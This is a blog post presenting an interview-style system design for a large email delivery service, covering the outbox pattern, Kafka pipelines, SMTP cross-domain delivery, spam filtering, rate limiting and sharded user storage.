DEV Community: Arghya Majumder

Email Delivery System — Gmail / Outlook

Arghya Majumder — Fri, 10 Apr 2026 10:43:50 +0000

Email Delivery System — Gmail / Outlook

Backend / Frontend Split: 90% Backend · 10% Frontend
The interesting engineering is entirely on the backend: transactional outbox pattern for zero email loss, SMTP protocol handshake for cross-domain delivery, async parallel validation pipeline, consistent hashing for sharding 1.5B user records, and routing logic to split internal vs external delivery. Frontend is a standard SPA — worth mentioning but not a deep focus.

1. Problem + Scope

Design an email delivery platform like Gmail. Users register with a unique email address, compose and send emails to one or multiple recipients (with CC/BCC and attachments), receive emails from other users across different domains, and search their mailbox by keyword.

In scope: User registration (unique email ID guarantee), compose + draft, send email (internal Gmail-to-Gmail + external cross-domain via SMTP), receive email from external domains, attachments, email threading, search.

Out of scope: Calendar integration, Google Meet, spam ML model training, email marketing bulk send, DKIM/SPF key management internals.

2. Assumptions & Scale

Metric	Value
Daily Active Users	1.5B
Emails sent per day	~300B (200 emails/user/day at peak)
Peak email send rate	~3.5M emails/sec
Avg email size (body + metadata)	75KB
Avg attachment size	2MB
Emails with attachments	~20%
Storage per user/year	~15GB
Total storage	1.5B × 15GB = 22.5 exabytes
Search QPS	~10M/sec
User DB lookup QPS	~50M/sec (autocomplete + auth)

Write path math:

3.5M emails/sec × 75KB body = ~260GB/sec of email body writes. This cannot land on a single DB. We need horizontally sharded storage for the mailbox, separated from metadata (for search optimization).

These numbers drive: sharded user DB (consistent hashing), separate mailbox body vs metadata tables, Elasticsearch with pre-joined aggregator, S3 for attachments (not DB), Kafka decoupled delivery pipeline.

3. Functional Requirements

User registration with globally unique email ID
Compose and auto-save email as draft (body + attachments)
Send email to one or multiple recipients (To, CC, BCC)
Receive email — both from Gmail users (internal) and other domains (Outlook, Yahoo) via SMTP
View inbox, drafts, sent items folder structure
Reply to email maintaining conversation thread
Attach files (PDF, images, documents) — up to 25MB
Search email by keyword (subject, body, sender)

4. Non-Functional Requirements

Requirement	Target
Email send latency	< 2 seconds for internal delivery
Cross-domain delivery	< 30 seconds (SMTP handshake + DNS lookup)
Availability	99.99% (email is business-critical)
Durability	Zero email loss — at-least-once delivery guaranteed
Search latency	< 500ms
Attachment upload	Non-blocking (async, pre-scanned before send)

Consistency Model — CAP Theorem applied per domain:

Domain	Model	Justification
User registration	Strong (CP)	No two users can share an email ID — uniqueness must be enforced globally
Email send/receive	Eventual (AP)	1–2 second delay reaching recipient's inbox is acceptable
Draft autosave	Eventual	Losing a draft keystroke is acceptable; losing a sent email is not
Validation pipeline	Eventual	Async parallel validation — email queued until all pass

[!IMPORTANT]
The consistency split is an interview favourite. Registration must be strongly consistent (unique email = primary key, DB constraint). Everything after that — send, receive, search — can be eventually consistent. This is why the write path goes through a queue, not a direct DB insert.

🧠 Mental Model

Email delivery has four distinct flows worth knowing cold:

Registration flow — User picks an email ID → system must guarantee no duplicate globally → consistent DB write with email as primary key
Compose + Send flow — User drafts email → attachments pre-uploaded to S3 → on Send: email saved to outbox table → Kafka consumer picks it up → validation pipeline (spam, malware, policy) → route to internal delivery or SMTP relay
Internal delivery flow — Recipient is a Gmail user → delivery consumer moves email from outbox table into recipient's mailbox items table → push notification
External delivery flow — Recipient is Outlook/Yahoo → SMTP relay worker does DNS/MX lookup → opens TCP connection to recipient's SMTP server → 15-step SMTP handshake → email delivered cross-domain

 User Composes Email
        │
        ▼
  Draft DB + S3 (attachments)
        │
   User clicks Send
        │
        ▼
  Mail Send Service
  (fetch from draft DB)
        │
        ▼
  Outbox Table (persisted first — never lose)
        │
  CDC / Outbox Consumer
        │
        ▼
     Kafka Broker
        │
  Delivery Orchestrator
  (spam + malware + policy — async parallel)
        │
   ┌────┴────────────┐
   ▼                 ▼
Inbound Topic    Outbound Topic
(Gmail→Gmail)    (Gmail→Outlook/Yahoo)
   │                 │
   ▼                 ▼
Delivery         SMTP Relay Worker
Consumer         (DNS/MX → TCP → handshake)
   │                 │
   ▼                 ▼
Mailbox DB      Recipient SMTP Server

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path	Perceived send latency	Optimistic: email saved to outbox immediately, UI shows "Sent" — delivery happens async
Reliable Path	Zero email loss	Transactional outbox pattern: email persisted before Kafka publish — survives any service crash

5. API Design

Method	Path	Description
POST	`/api/v1/accounts`	Register new user. Email ID in body. DB enforces uniqueness via primary key constraint.
POST	`/api/v1/emails/draft`	Autosave draft. Called on every keystroke with debounce. Returns `draftId`.
POST	`/api/v1/emails/send`	Send email. Body contains only `draftId` + recipients (To/CC/BCC) — NOT the content. Mail Send Service fetches content from Draft DB using `draftId`.
GET	`/api/v1/emails/:emailId`	Fetch full email (body + attachment URLs). Attachment URLs are pre-signed S3 URLs, not raw bytes.
GET	`/api/v1/emails?folder=inbox&page=`	Paginated mailbox listing. Returns metadata only (subject, sender, preview snippet).
POST	`/api/v1/attachments`	Upload attachment. Returns `attachmentId`. Client passes this ID in the draft — not the file bytes. Two-step upload: client → S3 signed URL (direct), then registers `attachmentId` here.
GET	`/api/v1/search?q=&page=`	Full-text search across subject + body. Hits Elasticsearch.

[!TIP]
Interview tip on send API design: The POST /emails/send body should contain draftId, not the full email payload. Say: "If we pass the entire email content + 25MB attachment in the send request, we get timeouts and heavy payload. We decouple: attachments are pre-uploaded to S3, body is pre-saved as draft. The send request is lightweight — just 'send draft X to these recipients.'"

6. End-to-End Flow

[!IMPORTANT]
Email is a queue-first system. Every send operation is asynchronous. The client never waits for delivery — it waits only for acknowledgement that the email has been durably queued. Delivery, validation, and routing happen independently in the background. This is not a performance choice — it is a correctness choice. Without a queue, any crash between "send clicked" and "email delivered" loses the email permanently.

⚡ Async Architecture Principles (say these out loud):

All email sending goes through Kafka — never direct DB or direct SMTP call
At-least-once delivery via Kafka offset commit — consumers can crash and replay
Idempotency via message_id — consumers deduplicate on re-processing
Retry with exponential backoff — SMTP failures retry for up to 4 days before bouncing
Dead Letter Queue — emails that exhaust retries are archived, never silently dropped

6.1 Send Email — Quick Reference (speak this out loud in the interview)

Internal flow (Gmail → Gmail):

1. Client clicks Send
   → POST /emails/send {draftId, recipients}
   → API Gateway authenticates + routes

2. Mail Send Service fetches draft content from Draft DB
   → validates recipients exist (User DB lookup)
   → I chose to separate draft storage from send to keep the send request lightweight

3. Email written to Outbox Table (PENDING)
   → This is the durability guarantee — crash after this = email survives
   → I chose the Transactional Outbox Pattern because DB write + Kafka publish
     cannot be made atomic any other way

4. Outbox Consumer (CDC) detects new row → publishes to Kafka
   → The queue absorbs burst — 3.5M emails/sec cannot hit storage directly

5. Delivery Orchestrator consumes from Kafka
   → Fires spam check + policy check + attachment check IN PARALLEL
   → Each validation service writes result to Validation DB independently
   → I run these in parallel because sequential = 3 × 200ms = 600ms per email

6. All checks pass → Orchestrator routes by recipient domain
   → @gmail.com → inbound-send-request topic
   → @outlook.com → outbound-send-request topic

7. Delivery Consumer picks up inbound event
   → Copies email to recipient's Mailbox Items table (Cassandra, partitioned by user_id)
   → Updates Outbox row status = DELIVERED
   → Triggers push notification

On failure at any step → Kafka consumer retries from last offset
On SMTP failure (external) → exponential backoff, try next MX record
After 4 days of failure → Dead Letter Queue → bounce email to sender

Receive flow (Outlook → Gmail):

1. Outlook SMTP server opens TCP connection to Gmail Inbound SMTP Service (port 25)
   → Gmail's MX record points here

2. SMTP handshake
   → Gmail validates: SPF (is this IP authorised to send for outlook.com?)
   → Gmail validates: DKIM (is the cryptographic signature valid?)
   → Gmail checks: does the recipient exist in User DB?
   → If recipient not found → 550 No such user → Outlook notifies its sender

3. Gmail accepts message off the wire → sends 250 Message accepted
   → This commits Gmail's responsibility — email is now durably ours
   → Outlook's responsibility ends here

4. Email published to Kafka inbound-receive topic
   → Spam Filter Service scores the email (layered: IP reputation → SPF/DKIM → ML model)
   → Score < 0.3 → folder = INBOX, score > 0.3 → folder = SPAM

5. Inbound Consumer writes to Cassandra mailbox_items
   → Partition key = recipient user_id → all inbox writes for one user go to one node
   → Aggregator Service indexes email body + metadata in Elasticsearch for search

6. Notification Service pushes to recipient's WebSocket connection
   → "New email from alice@outlook.com"
   → If no active WebSocket → mobile push notification (FCM/APNs)

6.2 Send Email (Internal — Gmail to Gmail, Sequence Diagram)

User clicks Send. Client calls POST /emails/send with { draftId, to: ["bob@gmail.com"], cc: [], bcc: [] }.
Mail Send Service fetches full email content from Draft DB using draftId (body + S3 attachment references).
Mail Send Service writes the email to the Outbox Table in Mailbox DB. Status = PENDING. This write is the durability guarantee — if anything crashes after this, the email is not lost.
Outbox Consumer (CDC pipeline watching Outbox Table) detects the new row and publishes the event to Kafka.
Delivery Orchestrator consumes from Kafka. Fires async parallel validation:
- Spam checker (content analysis)
- Policy checker (enterprise rules)
- Attachment check (reads pre-computed result from S3 Validation DB — scan already done at upload time)
All validations write their result to the Validation DB (one row per email, one column per check).
Once all validation columns are green: Orchestrator checks recipient domain. bob@gmail.com = internal → publishes to inbound-send-request Kafka topic.
Delivery Consumer picks up the inbound event. Copies email from Outbox Table → Mailbox Items Table for bob@gmail.com. Updates Outbox row status = DELIVERED.
Notification Service pushes "New email from alice@gmail.com" to Bob's connected WebSocket / push notification.

6.3 Send Email (External — Gmail to Outlook, Sequence Diagram)

Steps 1–6 same as above. At step 7, recipient domain = outlook.com → Orchestrator publishes to outbound-send-request topic.

6.4 Receive Email (External — Outlook to Gmail, Sequence Diagram)

This is the reverse of 6.2 — Outlook's SMTP server initiates the connection to Gmail's servers.

Key steps:

Outlook's SMTP server opens TCP connection to Gmail's Inbound SMTP Service (port 25 — the publicly exposed MX record for gmail.com)
Gmail's Inbound SMTP Service validates: SPF (is this IP authorised to send for outlook.com?), DKIM (is the signature valid?), does the recipient email exist in User DB?
If recipient doesn't exist → 550 No such user here → Outlook notifies its sender
Email passed to Spam Filter Service for scoring (see Deep Dive 9.5)
Based on spam score: published to Kafka inbound-receive with folder = INBOX or folder = SPAM
Inbound Consumer writes to Cassandra mailbox, partitioned by user_id
Notification Service pushes to recipient's connected WebSocket or mobile push

[!NOTE]
Key Insight: Gmail acknowledges 250 Message accepted to Outlook's SMTP server before the email is fully processed and in the inbox. This is intentional — once we've accepted the message off the wire, it's in our Kafka/DB pipeline and we own the delivery guarantee. The sender's responsibility ends at 250.

SMTP Relay Worker consumes from outbound-send-request.
DNS/MX lookup: queries MX resolver for outlook.com → gets list of Outlook SMTP server addresses with priority order. Result cached in MX Cache (TTL = 1 hour) — avoids DNS round-trip on every email.
SMTP Relay Worker opens TCP connection to Outlook SMTP server on port 25.
SMTP handshake:
- Gmail sends EHLO → Outlook responds 250 + supported extensions
- Gmail sends MAIL FROM: alice@gmail.com → Outlook responds 250 OK
- Gmail sends RCPT TO: bob@outlook.com → Outlook validates bob exists in its DB → 250 OK (or 550 No such user)
- Gmail sends DATA → streams headers + body → Outlook responds 250 Message accepted
- Gmail sends QUIT
Outlook's own delivery system routes email to Bob's inbox.
SMTP Relay Worker receives 250 success → updates Outbox Table status = DELIVERED_EXTERNAL.

7. High-Level Architecture

Simple Design

Evolved Design (Full Pipeline)

8. Data Model

[!IMPORTANT]
Gmail uses three separate storage systems — never one. This is the most important storage design insight and interviewers always probe it:

What Where Why

Email bodies + mailbox Cassandra (NoSQL) 3.5M writes/sec — multi-master, partitioned by user_id. SQL primary would be first bottleneck.

Attachments S3 / Blob Storage Binary files (up to 25MB) never go in a DB. S3 = infinite scale, cheap, CDN-compatible. Emails store only the S3 reference URL.

Search index Elasticsearch Full-text search with inverted index. Pre-joined at write time by Aggregator Service. Never query Cassandra for search — it has no full-text capability.

"I chose three separate stores because each has a fundamentally different access pattern. One store trying to do all three would fail at scale."

What	Where	Why
Email bodies + mailbox	Cassandra (NoSQL)	3.5M writes/sec — multi-master, partitioned by `user_id`. SQL primary would be first bottleneck.
Attachments	S3 / Blob Storage	Binary files (up to 25MB) never go in a DB. S3 = infinite scale, cheap, CDN-compatible. Emails store only the S3 reference URL.
Search index	Elasticsearch	Full-text search with inverted index. Pre-joined at write time by Aggregator Service. Never query Cassandra for search — it has no full-text capability.

Entity	Storage	Key Columns	Why this store
User	PostgreSQL (sharded)	`email_id` (PK), `user_id`, `password_hash`, `status`, `created_at`	ACID — `email_id` as PK enforces uniqueness. Sharded by consistent hashing on `email_id`.
Draft	PostgreSQL	`draft_id`, `user_id`, `to`, `cc`, `bcc`, `subject`, `body`, `attachment_ids[]`, `updated_at`	ACID — drafts are personal, low-write-volume. Simple relational structure.
Outbox Table	PostgreSQL	`message_id`, `sender_id`, `recipient_ids[]`, `draft_id`, `status` (PENDING/DELIVERED), `created_at`	Transactional outbox — must be in same DB as other mail writes for atomicity. CDC triggers Kafka.
Mailbox Items	Cassandra	`user_id` (partition key), `message_id` (clustering key, TIMEUUID), `sender_id`, `subject`, `body_ref`, `folder`, `is_read`	3.5M writes/sec inbox delivery — Cassandra multi-master handles linear scale. Partition by `user_id` for fast inbox queries.
Mailbox Metadata	Cassandra	`message_id`, `sender_id`, `recipient_ids[]`, `subject`, `attachment_type`, `folder`, `timestamp`	Separated from body — search aggregator joins metadata + body ref. Avoids loading full email bodies for search index.
Validation DB	PostgreSQL	`message_id`, `spam_check` (bool), `policy_check` (bool), `attachment_check` (bool), `updated_at`	Small table, low volume — one row per in-flight email. Ephemeral (deleted post-delivery).
S3 Validation	Redis	`attachmentId → {status, scanned_at}`	Pre-computed at upload time. TTL = 7 days. Fast lookup at validation time — O(1).
MX Cache	Redis	`domain → [smtp_server_address, priority]`	DNS is slow (~100ms). MX records change rarely. TTL = 1 hour.
Attachments	S3	Binary blob, referenced by `attachmentId`	Binary files don't belong in DB. Pre-signed URLs for secure client access.
Search Index	Elasticsearch	`message_id`, `sender`, `recipients`, `subject`, `body_snippet`, `timestamp`	Full-text search with inverted index. Pre-joined by Aggregator service — avoids runtime joins.

[!NOTE]
Key Insight: Mailbox body and metadata are stored in separate Cassandra tables. Aggregator pre-joins them into Elasticsearch documents at write time — not at search time. Runtime joins at 10M search QPS = latency disaster.

9. Deep Dives

9.1 Transactional Outbox Pattern — Zero Email Loss

Here's the problem we're solving: When a user clicks Send, we need to both save the email to DB AND publish to Kafka. If we publish to Kafka first and the service crashes before DB write — email appears sent but is lost. If we write to DB first and crash before Kafka publish — email stuck in DB, never delivered. How do we guarantee at-least-once delivery?

Naive solution: Write to DB and publish to Kafka in sequence. Problem: not atomic — any crash between the two leaves the system in an inconsistent state.

Chosen solution — Transactional Outbox Pattern:

Mail Send Service writes the email to the Outbox Table in the same DB transaction as any other state update. DB write = durability guarantee.
A separate Outbox Consumer (Change Data Capture — watches the Outbox Table for new rows via Postgres logical replication or polling) publishes to Kafka.
The Outbox Consumer runs independently. If it crashes, it resumes from the last committed offset — Kafka publish is retried. Email is never lost.
Once delivered, Outbox Table row is updated to DELIVERED (or archived).

Trade-off accepted: Adds operational complexity (CDC pipeline, extra table). Delivery is at-least-once — if Outbox Consumer crashes mid-publish, the same email may be published twice. Handle with idempotency key (message_id) at the consumer side.

[!NOTE]
Key Insight: The Outbox Table is a correctness requirement, not a performance optimization. It makes DB write and Kafka publish atomic by using the DB as the source of truth, not Kafka.

9.2 Async Parallel Validation Pipeline

Here's the problem we're solving: Before delivering an email, we must run spam check, policy check, and attachment scan. If we run these sequentially: 3 services × 200ms each = 600ms minimum per email at 3.5M emails/sec = billions of seconds of latency stacked up. If one validation service goes down for 15 minutes, every in-flight email blocks forever.

Naive solution: Sequential synchronous calls from Orchestrator to each validation service. Service downtime = full pipeline stall.

Chosen solution — Async parallel with Validation DB:

Orchestrator consumes email from Kafka. Creates a row in Validation DB with all check columns set to NULL (not-yet-checked).
Orchestrator fires all validation services simultaneously (async, non-blocking).
Each service independently reads the email, runs its check, and updates its column in Validation DB (e.g., spam_check = true).
Attachment check is special — it reads from the pre-computed S3 Validation DB (scan was done at upload time, not send time). Scanning a 25MB PDF at send time = too slow.
Orchestrator polls Validation DB (or uses a trigger) until all columns are non-NULL. If all green → route to delivery topic. If any red → reject + notify sender.
If a validation service is down: that column stays NULL. After a timeout, email moves to Delay Queue and is retried later — pipeline never blocks permanently.

Trade-off accepted: Eventual consistency in validation — a service returning after a delay means email delivery is delayed, not blocked. This is acceptable; blocking is not.

[!NOTE]
Key Insight: Attachment scanning is pre-computed at upload time, not at send time. By send time, the result is already in S3 Validation DB — the check is O(1) Redis lookup. This is the only way to keep the validation pipeline fast.

9.3 SMTP Cross-Domain Delivery — 15-Step Handshake

Here's the problem we're solving: Gmail doesn't know how to deliver to Outlook. They're separate networks. How do two mail servers that have never met communicate?

The answer is SMTP (Simple Mail Transfer Protocol) — a standardized set of rules all mail servers follow. SMTP is not a service or a server; it is a protocol.

SMTP Relay Worker flow:

Consumes email from outbound-send-request Kafka topic.
MX Lookup: Queries DNS MX resolver for recipient domain (e.g., outlook.com). Gets list of Outlook SMTP server addresses with priority (lower number = higher priority). Caches result in MX Cache (Redis, TTL = 1 hour).
Opens TCP connection to Outlook SMTP server on port 25.
Outlook responds: 220 outlook.com ESMTP ready
Gmail sends: EHLO gmail.com (identify ourselves)
Outlook responds: 250 + list of supported extensions (TLS, size limits, etc.)
Gmail sends: MAIL FROM: alice@gmail.com — Outlook logs the sender
Outlook responds: 250 OK
Gmail sends: RCPT TO: bob@outlook.com — critical validation step
Outlook checks if bob@outlook.com exists in its own user DB. If not: 550 No such user here — delivery fails, Gmail notifies Alice. If yes: 250 OK
Gmail sends: DATA — signals start of email content
Outlook responds: 354 Start mail input
Gmail streams: headers + body + attachment references
Gmail sends: . (single period = end of message)
Outlook responds: 250 Message accepted for delivery — email is in Outlook's inbox pipeline
Gmail sends: QUIT → TCP connection closed
SMTP Relay Worker receives 250 → updates Outbox Table status = DELIVERED_EXTERNAL

Trade-off accepted: If Outlook's SMTP server is temporarily unreachable, SMTP Relay Worker retries with exponential backoff using the next-priority MX record. Email may be delayed minutes. This is expected behaviour and standard in SMTP.

[!NOTE]
Key Insight: SMTP is the lingua franca of email servers. Every mail server — Gmail, Outlook, Yahoo — speaks it. The MX cache is critical: DNS lookup adds ~100ms. At 3.5M cross-domain emails/sec, skipping DNS for cached domains saves ~350K CPU-seconds per second.

9.4 Spam Filtering Design

Here's the problem we're solving: Gmail receives ~3.5M emails/sec from external senders. ~45% of global email is spam. Without filtering, user inboxes are unusable. Filtering must be fast enough to not block the inbound pipeline and accurate enough that legitimate emails don't land in spam.

Naive solution — keyword blocklist:

if email.body contains "free money" → mark as spam

Fails: spammers trivially evade keyword lists. Recall is low, false-positive rate is high.

Chosen solution — layered scoring system:

Layer breakdown:

Layer	What it checks	Speed	Impact
Sender Reputation	IP blocklist, domain reputation score, past abuse reports	< 1ms (Redis lookup)	Blocks ~60% of spam before content is read
Authentication	SPF: is sending IP authorised for this domain? DKIM: is cryptographic signature valid?	< 5ms (DNS cached)	Eliminates spoofed sender domains
Content Analysis	ML classifier (trained on billions of labelled emails); features: TF-IDF, URL reputation, attachment type, link density	50–100ms	Catches novel spam patterns
Behavioral Signals	How often do recipients mark similar emails as spam? Do users who receive this sender's mail read it or delete unread?	Async (pre-computed daily)	Adapts to user-specific preferences

Scoring thresholds:

Score < 0.3 → INBOX
Score 0.3–0.7 → SPAM folder (user can recover)
Score > 0.7 → rejected at SMTP layer before 250 is sent (sender gets bounce)

Why the layered approach:

Layer 1 (sender reputation) eliminates 60% of spam in < 1ms — cheap. Don't spend ML compute on obvious spam.
Only emails that pass Layer 1+2 get the expensive ML content scan
At 3.5M emails/sec × 100ms ML scan = impossible if applied to all. After Layer 1 filtering, only ~40% need ML = 1.4M/sec — manageable with horizontal scaling of the ML inference fleet

Trade-off accepted: Probabilistic scoring means some spam reaches inboxes and some legitimate email lands in spam. No spam filter achieves 100% accuracy. The threshold (0.3/0.7) is tunable — Gmail adjusts per-user based on their "Mark as not spam" actions.

[!NOTE]
Key Insight: Spam filtering is a cost optimisation problem as much as an accuracy problem. Layer cheap filters first (IP blocklist = 1ms), expensive filters last (ML = 100ms). Only ~40% of mail needs the ML model after reputation filtering. This is the difference between 1.4M ML inferences/sec and 3.5M.

9.5 Rate Limiting and Abuse Protection

Here's the problem we're solving: A compromised Gmail account or a bulk-sender service can send millions of emails in seconds — spamming recipient inboxes and abusing our SMTP relay infrastructure. Without rate limiting, one bad actor can degrade delivery for all other users.

Two surfaces to protect:

Send rate per user — prevent a single account from sending bulk spam
Inbound SMTP rate per source IP — prevent external servers from flooding our inbound pipeline

Send rate limiting (per user):

Redis key: rate:{userId}:{window}
Type: sliding window counter (token bucket)

Limits (configurable by account tier):
  - Free account:    500 emails/day, 25 emails/minute
  - Google Workspace: 2,000 emails/day, 100 emails/minute
  - API (Gmail API): configurable, with abuse monitoring

Implementation:

Mail Send Service checks Redis rate counter before writing to Outbox Table
INCR rate:{userId}:{windowBucket} with EXPIRE = window_duration
If counter > limit → 429 Too Many Requests to client; email not queued
Sliding window: separate counters per minute-bucket, aggregate last 60 buckets for per-hour limit

Inbound SMTP rate limiting (per source IP):

Inbound SMTP Service tracks connection count per source IP in Redis
If source IP opens > 100 connections/sec → temporary 421 Service not available, try again later
If source IP has high spam score (from Sender Reputation layer) → blackhole connections silently
IP reputation updated by Spam Filter Service feedback loop — IPs that consistently send spam get progressively lower connection limits

Abuse signals that trigger automatic throttling:

Signal	Action
> 1% bounce rate on sent emails	Throttle send rate by 50%
> 0.1% spam reports from recipients	Flag account for review
Sudden 10× spike in send volume	Require re-authentication (2FA)
Email content matches known spam pattern	Block send immediately

Dead Letter Queue (DLQ) for undeliverable emails:

Emails that fail all SMTP retry attempts (4 days) → moved to DLQ
DLQ worker sends non-delivery report (NDR) bounce email to original sender
Email is then archived (not deleted) for compliance audit trail

[!NOTE]
Key Insight: Rate limiting is a correctness requirement for email, not just a performance guard. An email platform without rate limits becomes a free spam cannon. The sliding window counter in Redis costs < 1ms per send — there is no reason not to check it on every send request.

9.6 User Registration — Uniqueness at 1.5B Scale

Here's the problem we're solving: No two users can register with the same email ID. At 1.5B users, a single PostgreSQL instance can't hold all records or serve 50M autocomplete lookups/sec. How do we enforce global uniqueness while sharding?

Naive solution: Single DB, email as primary key. Enforces uniqueness trivially. Fails at scale — table too large, single point of failure.

Chosen solution — Consistent Hashing + Primary Key constraint:

Hash the email ID → modulo assigns it to a shard.
Consistent hashing ring (not simple modulo): adding a shard only redistributes a fraction of keys, not all of them. Simple modulo with 10 shards → if you add shard 11, all hash % 10 ≠ hash % 11 entries must be remapped. Consistent hashing: only keys on the affected arc move.
Each shard has email_id as PRIMARY KEY — DB-level uniqueness enforced within the shard.
Concurrent registration race condition: Two users try alice@gmail.com simultaneously on the same shard. PRIMARY KEY constraint rejects the second insert. First commit wins — ACID guarantee.

User Cache for autocomplete:

Redis cache per user: stores top 50 recently-contacted email IDs + all contact book entries. TTL = session duration.
On typing in To/CC field: check user cache first. Cache hit → show autocomplete. Cache miss (unknown email) → no suggestion until user presses Enter → DB lookup only on explicit intent.
Why cache? 50M QPS autocomplete hits against a sharded DB at 50M lookups/sec × 10ms per lookup = 500K seconds of compute/sec. Cache brings this to < 1ms.

[!NOTE]
Key Insight: Uniqueness is enforced at the shard level via PRIMARY KEY, not via a global lock or cross-shard lookup. Consistent hashing guarantees each email maps to exactly one shard. Two registrations for the same email ID always land on the same shard — DB constraint handles the race.

10. Bottlenecks & Scaling

Scale we're designing for (say this explicitly in the interview):

1.5 billion users. ~300 billion emails/day. 3.5 million emails/sec at peak.
22.5 exabytes total storage. 260 GB/sec of mailbox write throughput.
The sharding strategy for this scale: partition mailbox by user_id. Every inbox query and every inbox write is WHERE user_id = ? — so every operation hits exactly one Cassandra partition. No scatter-gather. No cross-shard joins. This is intentional by design, not coincidence.

What breaks first at 10× scale:

Mailbox writes (35M emails/sec):
- Cassandra sharded by user_id handles this. Add nodes horizontally — Cassandra rebalances automatically.
- Read path: SELECT * FROM mailbox_items WHERE user_id = ? ORDER BY message_id DESC LIMIT 50 — single partition scan, fast.
Search at 100M QPS:
- Elasticsearch cluster with data nodes sharded by user_id. Each user's emails live on the same shard — no scatter-gather.
- Aggregator Service pre-joins body + metadata before indexing. Never join at query time.
- Cache recent search results in Redis: search:{userId}:{queryHash} → result TTL = 5 min.
SMTP Relay Worker saturation:
- Stateless workers — scale horizontally. Each worker handles its own TCP connection pool to external SMTP servers.
- Per-domain connection pooling: opening a new TCP + TLS connection to Outlook per email is expensive. Maintain persistent connection pools per domain.
- MX Cache hit rate target: > 99% (most emails go to top 10 domains — Gmail, Outlook, Yahoo, corporate domains).
User DB autocomplete (50M QPS):
- Served from User Cache (Redis) for 95%+ of requests.
- User DB only hit on cache miss (unknown email + Enter key). Read replicas absorb the remaining load.

11. Failure Scenarios

Failure	Impact	Recovery
Mail Send Service crashes after Outbox write	No impact	Outbox Consumer retries Kafka publish. Email not lost — it's in the DB.
Kafka broker goes down	Email delivery stalls	Outbox Consumer retries with backoff. Emails queue up in Outbox Table. Kafka cluster is multi-broker — single broker failure doesn't down the cluster.
Validation service (spam/policy) goes down	Emails pile up in Delay Queue	After timeout, moved to Delay Queue, retried on recovery. Does not block all emails — only those awaiting that specific check.
SMTP Relay Worker can't reach Outlook	External email delayed	Exponential backoff retry. Try next-priority MX record. Industry-standard: retry for up to 4 days before bouncing.
Cassandra node fails	Partial inbox unavailability for affected partition range	Replication factor = 3. Reads/writes rerouted to replicas. No data loss.
Elasticsearch node fails	Search degraded	ES cluster rebalances shards to healthy nodes. Search may be slow during rebalance but never fully down.
S3 outage	Attachment upload fails	Client retries. Draft saves without attachment. Email can't be sent until attachment upload succeeds — enforced client-side.

12. Trade-offs

Cassandra vs PostgreSQL for Mailbox

Dimension	Cassandra	PostgreSQL
Write throughput	Multi-master, linear scale (35M writes/sec)	Single primary ~100K writes/sec ceiling
Query flexibility	Limited — must know partition key	Full SQL, joins, complex queries
Consistency	Eventual (tunable quorum)	Strong ACID
Operational complexity	Higher — tuning compaction, GC	Lower

Chosen: Cassandra — mailbox is write-heavy (every email = inbox write), append-only, always queried by user_id. No joins needed. PostgreSQL primary would be the first bottleneck at scale.

[!NOTE]
Key Insight: Mailbox is an append-only, partition-by-user workload. Cassandra's partition model is a perfect fit — every query is WHERE user_id = ? and every write is to a known partition. No cross-partition queries ever needed.

Sync vs Async Delivery Pipeline

Dimension	Sync (direct call)	Async (Kafka + Outbox)
Simplicity	Simple — no queue	Complex — CDC + Kafka + consumers
Durability	Email lost if service crashes	Zero loss — email persisted before Kafka
Validation	Blocks send response	Non-blocking — UI shows "Sent" immediately
Scale	Each service must scale with send rate	Each stage scales independently

Chosen: Async — at 3.5M emails/sec, synchronous validation would require every validation service to handle 3.5M req/sec simultaneously or become the bottleneck. Async decouples each stage.

[!NOTE]
Key Insight: The queue is not a performance optimization — it's a correctness requirement. Without the Outbox Table + Kafka, a service crash between "email saved" and "email delivered" loses the email permanently.

Pre-scan Attachments vs Scan at Send Time

Dimension	Pre-scan at upload	Scan at send time
Send latency	Zero — result pre-computed	+200–500ms per attachment
Resource usage	Scanning at low-traffic upload time	Scanning during high-traffic send window
Stale scan risk	Attachment modified after scan? No — S3 is immutable	N/A

Chosen: Pre-scan at upload — scanning a 25MB PDF at send time adds unacceptable latency to the hot send path. S3 objects are immutable — a scan result at upload time is always valid.

[!NOTE]
Key Insight: Move expensive work out of the critical path. Attachment scanning is O(file_size) — it belongs at upload time (low frequency, user is waiting anyway) not at send time (high frequency, user expects instant delivery).

Frontend Notes (10% of design)

Component	Pattern	Why it matters in an interview
Inbox list	Cursor-based pagination; metadata only (no body)	3.5M emails/sec × full body = 260GB/sec read traffic. Only load body on open.
Virtual scroll	Virtualise DOM — only render visible email rows	A user with 50K emails in inbox = 50K DOM nodes if fully rendered. Browser crashes.
New email notification	WebSocket connection to Notification Service	Long-poll alternative = wasted requests every 15 seconds. WebSocket = server-pushed on new delivery event.
Inbox caching	Cache first 2 pages of inbox in IndexedDB (client)	Gmail opens instantly because the last-seen inbox is stored locally. Background refresh fetches newer emails.
Optimistic send	Mark email as "Sent" in UI immediately on `202 Accepted`	Async pipeline means server can't confirm delivery synchronously. Show optimistic state; handle errors on webhook.
Draft autosave	Debounce 2 seconds after last keystroke → `PATCH /draft/:id`	Without debounce: typing at 60 WPM × autosave per keystroke = ~5 API calls/sec per composer window.
Attachment upload	Direct client → S3 via pre-signed URL; progress bar from S3 multipart upload events	Don't route 25MB files through your API servers — direct S3 upload offloads bandwidth entirely.
Search	Debounce search input 300ms; show skeleton loaders	Elasticsearch at < 500ms feels instant if UI provides loading feedback. Don't block compose on search.

Interview Summary

Key Decisions

Decision	Problem it solves	Trade-off accepted
Transactional Outbox Pattern	Zero email loss on service crash	CDC pipeline complexity; at-least-once delivery (idempotency needed at consumer)
Cassandra for Mailbox Items	35M writes/sec inbox delivery	Eventual consistency; limited query flexibility (no joins)
Pre-computed attachment scans	Keep send path fast	S3 Validation DB must be maintained; small storage overhead
Consistent hashing for User DB	Shard 1.5B users without remapping all keys on scale-out	More complex routing layer vs simple modulo sharding
Async parallel validation	Avoid blocking send on slow/down validation services	Eventual delivery (email delayed, not blocked, on service outage)
Separate mailbox body + metadata	Elasticsearch aggregator pre-joins at index time	Two tables to maintain; aggregator service adds complexity

Fast Path vs Reliable Path

FAST PATH (optimized for perceived send latency)
  User clicks Send
      │
      ▼
  Mail Send Service writes to Outbox Table (DB write = durable)
      │
  UI immediately shows "Message Sent" ← user feedback is instant
      │
  Outbox Consumer detects CDC event → Kafka (async, non-blocking)


RELIABLE PATH (optimized for zero email loss)
  If Kafka publish fails → Outbox Consumer retries from DB
  If Delivery Orchestrator crashes → resumes from Kafka offset
  If Validation service down → email moves to Delay Queue, retried on recovery
  If SMTP handshake fails → exponential backoff, try next MX record, retry up to 4 days
